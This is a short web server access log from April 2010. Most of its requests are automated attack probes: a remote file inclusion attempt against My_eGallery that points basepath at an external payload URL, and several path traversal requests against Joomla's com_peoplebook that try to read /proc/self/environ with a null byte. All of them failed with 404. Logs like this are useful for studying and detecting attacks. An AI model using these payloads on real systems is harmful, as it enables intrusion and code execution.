114.108.151.149 - - [28/Apr/2010:03:09:38 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
207.46.199.198 - - [28/Apr/2010:03:10:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.198.171.53 - - [28/Apr/2010:03:10:15 -0500] "GET /logs/access_log.1219708800/index.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
87.198.171.53 - - [28/Apr/2010:03:10:16 -0500] "GET /index.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.198.171.53 - - [28/Apr/2010:03:10:16 -0500] "GET /logs/index.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
